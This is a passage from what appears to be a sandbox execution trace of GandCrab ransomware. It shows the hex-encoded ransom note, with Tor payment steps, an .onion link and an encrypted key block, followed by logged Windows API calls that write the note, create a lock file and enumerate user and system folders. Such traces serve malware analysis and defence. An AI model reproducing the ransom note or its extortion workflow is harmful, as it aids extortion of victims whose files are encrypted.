x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.927] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.928] CloseHandle (hObject=0x230) returned 1 [0096.928] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.928] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.928] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0xee)) [0096.928] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.928] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.928] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.928] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\SendTo\\d2ca4a09d2ca4deb61a.lock") returned 48 [0096.929] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\sendto\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.929] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.930] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.930] lstrlenW (lpString="C:\\Users\\Default\\SendTo\\") returned 24 [0096.930] lstrcatW (in: lpString1="C:\\Users\\Default\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\SendTo\\*") returned="C:\\Users\\Default\\SendTo\\*" [0096.930] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\SendTo\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.930] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.930] CloseHandle (hObject=0x230) returned 1 [0096.930] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.930] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0096.930] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0096.930] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu" [0096.930] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\" [0096.930] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.931] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.931] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.932] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 